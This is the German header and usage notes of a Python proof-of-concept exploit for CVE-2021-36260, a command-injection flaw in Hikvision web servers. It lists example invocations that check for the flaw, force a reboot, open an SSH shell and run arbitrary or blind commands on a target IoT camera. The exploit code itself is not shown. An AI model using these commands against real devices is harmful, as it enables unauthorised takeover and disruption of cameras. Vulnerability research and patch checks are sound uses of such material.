
Python-Exploit für CVE-2021-36260 Befehlseinschleusung in Hikvision-Webservern. Unterstützt sichere/unsichere Schwachstellenverifizierung, Fernausführung von Befehlen und SSH-Shell-Zugriff auf IoT-Geräte.
CVE-2021-36260 POC Command Injection Schwachstelle im Webserver einiger Hikvision-Produkte. Aufgrund unzureichender Eingabevalidierung kann ein Angreifer die Schwachstelle ausnutzen, um einen Command-Injection-Angriff zu starten, indem er Nachrichten mit bösartigen Befehlen sendet.
Exploit Titel: Hikvision Web Server Build 210702 - Command Injection
Exploit Autor: bashis -- Fehlerbereinigung durch shubtheone
Hersteller Homepage: https://www.hikvision.com/
Version: 1.0
CVE: CVE-2021-36260
Referenz: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Hinweise:
[Beispiele] Sicherer Schwachstellen-/Verifikationscheck: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Sicherer und unsicherer Schwachstellen-/Verifikationscheck: (wird den 'unsicheren Check' nur verwenden, wenn der 'sichere Check' nicht verifiziert hat) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Unsichere Schwachstellen-/Verifikationscheck: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Starten und Verbinden zur SSH-Shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Befehl ausführen: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Blinden Befehl ausführen: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"